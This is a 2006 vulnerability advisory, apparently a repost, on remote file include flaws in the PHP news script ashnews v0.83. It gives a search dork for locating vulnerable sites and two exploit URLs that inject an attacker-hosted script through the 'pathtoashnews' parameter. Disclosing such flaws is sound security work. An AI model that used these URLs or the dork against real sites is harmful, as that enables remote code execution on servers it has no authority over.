Security Advisory: ashnews v0.83(pathtoashnews) - Remote File Include Vulnerabilities

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Igloo 0.1.9 and prior [(text_wiki mod)] - Remote File Include Vulnerabilities
  Informium 0.12.0 - Remote File Include Vulnerabilities
  [DRUPAL-SA-2006-008] Drupal 4.6.8 / 4.7.2 fixes XSS issue
  [DRUPAL-SA-2006-007] Drupal 4.6.8 / 4.7.2 fixes arbitrary file execution issue

From: Kacper <kacper1964_(at)_yahoo.pl>
Date: 03.06.2006
Subject: ashnews v0.83(pathtoashnews) - Remote File Include Vulnerabilities

################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# ashnews v0.83(pathtoashnews) - Remote File Include Vulnerabilities
# Script site: http://dev.ashwebstudio.com/
# dork: News powered by ashnews
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################
Expl:

http://www.site.com/[ashnews_path]/ashheadlines.
php?pathtoashnews=[evil_scripts]

http://www.site.com/[ashnews_path]/ashnews.php?pathtoashnews=[evil_scripts]

#Elo ;-)

test server